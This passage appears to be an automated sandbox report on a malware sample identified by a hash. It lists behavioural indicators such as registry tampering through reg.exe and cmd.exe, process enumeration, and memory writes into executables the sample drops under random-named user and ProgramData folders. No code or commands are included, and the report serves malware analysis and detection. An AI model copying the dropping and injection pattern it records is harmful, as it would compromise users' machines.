Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4452 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe
PID 4452 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe
PID 4452 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe
PID 4452 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\ProgramData\WCwgcgww\QuYEoUUs.exe
PID 4452 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\ProgramData\WCwgcgww\QuYEoUUs.exe
PID 4452 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\ProgramData\WCwgcgww\QuYEoUUs.exe
PID 4452 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
